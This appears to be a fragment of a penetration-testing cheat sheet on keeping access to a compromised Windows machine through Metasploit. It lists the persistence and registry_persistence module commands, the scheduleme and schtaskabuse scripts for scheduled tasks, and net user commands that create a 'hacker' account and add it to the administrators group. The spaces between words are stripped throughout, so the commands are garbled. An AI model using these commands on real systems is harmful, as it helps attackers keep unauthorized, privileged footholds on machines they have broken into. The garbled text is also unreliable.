# Check available optionsrunpersistence-h# Example using registry persistenceuseexploit/windows/local/registry_persistencesetSESSION<SESSION_NUMBER>exploit
Scheduled Tasks
# Run scheduleme for simple scheduled task creationrunscheduleme# For more advanced options, use schtaskabuserunschtaskabuse
Adding a User
# Add a user using the net user commandnetuserhackerpassword123/add# Set additional details for the usernetuserhacker/fullname:"Hacker User"/comment:"Added by the attacker"/passwordchg:no# Add the user to the local administrators groupnetlocalgroupadministratorshacker/add